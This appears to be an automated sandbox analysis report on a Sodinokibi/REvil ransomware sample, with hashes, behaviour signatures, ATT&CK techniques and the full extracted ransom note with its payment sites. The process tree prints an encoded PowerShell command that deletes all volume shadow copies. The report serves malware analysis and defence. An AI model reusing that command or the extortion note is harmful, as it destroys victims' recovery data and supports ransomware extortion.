Analysis

  • max time kernel
    173s
  • max time network
    192s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    24-01-2022 01:23

General

  • Target

    a6c49e91750585b4d1dc1ac7aa04c37cf9747d394ba85d94b2ec40e711a55cef.exe

  • Size

    400KB

  • MD5

    f95f60dc1265fd947608387253732f1a

  • SHA1

    4c3293dacbd7d8c3b0895eb4f3ced6abcfa3b16f

  • SHA256

    a6c49e91750585b4d1dc1ac7aa04c37cf9747d394ba85d94b2ec40e711a55cef

  • SHA512

    2e77e62cf8eb5db45d79174b5b643626383e9bd5a30fb4daffe8f08d780f5f42ed6093cd288816af9d6a36f10c55b638e6f741f1fce1207d6c0b7c5a8e6ae920

Malware Config

Extracted

Path

C:\748p84-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on you computer has expansion 748p84. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/20EAF7A94ECDF54C 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/20EAF7A94ECDF54C Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: c+bzhVKUWX6J4Ntjr0Gqm2dr8UDf7qdlThrDddgn0xZ3GpAMJH491Dt+jKOEA1Ds EOEkN+73XhzKhpxeaVePPg51/v4V4fCNaMLlrXDT49C9B07bbtc8rdOQAjxyak0e 4rwRp6ROLA/rqrzGvMoRwFa0cW4uOajagdOqk6gGX3I+D0+v/QPd8XLmZXW3syby SZreIjP6RYlx7HapH2KssWlvRqEc+aIIMYYnA2BZfu/0t/hRz9I2AZglD6h1YgQy +oNH6vJuPbi7+WYh2iUFGkYCxdSMUzaP0akZojgsil1ybKoe96dtdVoK8YYPvKZO PmgPhHTPgm4MVbN0BZ0duY/VM/3zAUsP/1cMhgNc4wTXuR82feVmJujxIURwYL9i Ro3OFx1htxSTRkyUCKaUkXEjMvwFNcxjFhM8c5l1Tg5+K8fwc6DHWkXsRczluIu4 D1HqGO8SPvHBjOvlfKZEHTQV+NGqZqQoJWZVb64wCH1PiWynJqSIH20xJUvRV4S0 iyRb0MJ2MyvX1/j5vOSESyuV9rapVmsihHwr2gbfUMn4onsocYIFGBIaGuOiUz+1 U/N3iVXxw5wFI99XbRFrlglzismIMU7CBsoqIbIOuYTfmQnwbX1hlVJ4KKRVE0lL 6wkb7mWxZ6s3We8919tB2/uMPXP0rFc7u1+IxsSWse+E/ebSrJbyeLV5h0goC574 SMqyeodkD2iOF5rTgCs17bHjjIioBKAid2jlGh4syHADNhSottXyAvOFzB56zTfJ 9u5KP9/2b9fqcCfJDN6tkl+40Iegw5ZHFvoM66PWNgwSB08ZvKlV36Cxw/VfPU2F ghaaIScykHYKyzZds14L3UOUvm7/RDmh/RYbHo8MHHstjIy+Cag7AlDPZSk2R8AL w6gWNxBKTC3mguxdEknFmdkBGxT98WdRy+rhIXEgQIwqrtBic5ryo1psKy9xIjAQ xLZXU91hLWhMMNHZz+Nn+EgPrZ1ctpylO/r3Ki06xSmlM+e7E4E1R5RJTPWoXqJz 3WBpu8ruAfuMLCkzlC41IQuh+wdFhn9Myqq8TfD0dUVTitcuJtCyNpACVe5w0HDQ p1aFHQ472kIQO1sA08Jj+ZcESKfNzNnDc3x+J40dHhGseYufc5i+Qlol5WefD1AL lhTg7aSM1ryUf+FT9EDIBHTL3MjgBnGLIcqWVnpynDtO7autooWGAIl9nwFFrHkv GCovqitVmvO9IZ5vk9+xQbezZNAycDjU9ooJHaKyO53ZVRWzaodloNlNYRMBr6DV GiHnPCIis9LoPKX8lPtdzg== Extension name: 748p84 ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/20EAF7A94ECDF54C

http://decryptor.cc/20EAF7A94ECDF54C

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Modifies extensions of user files 5 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Program Files directory 26 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\a6c49e91750585b4d1dc1ac7aa04c37cf9747d394ba85d94b2ec40e711a55cef.exe
    "C:\Users\Admin\AppData\Local\Temp\a6c49e91750585b4d1dc1ac7aa04c37cf9747d394ba85d94b2ec40e711a55cef.exe"
    1⤵
    • Modifies extensions of user files
    • Adds Run key to start application
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2480
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1940
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:1016
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:4068

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Persistence

    Registry Run Keys / Startup Folder

    1
    T1060

    Defense Evasion

    Modify Registry

    1
    T1112

    Discovery

    Query Registry

    1
    T1012

    Peripheral Device Discovery

    1
    T1120

    System Information Discovery

    1
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/1940-119-0x0000029993750000-0x0000029993772000-memory.dmp
      Filesize

      136KB

    • memory/1940-122-0x00000299ABA90000-0x00000299ABB06000-memory.dmp
      Filesize

      472KB

    • memory/1940-129-0x00000299937A0000-0x00000299AB990000-memory.dmp
      Filesize

      385.9MB

    • memory/1940-130-0x00000299937A0000-0x00000299AB990000-memory.dmp
      Filesize

      385.9MB

    • memory/1940-136-0x00000299937A0000-0x00000299AB990000-memory.dmp
      Filesize

      385.9MB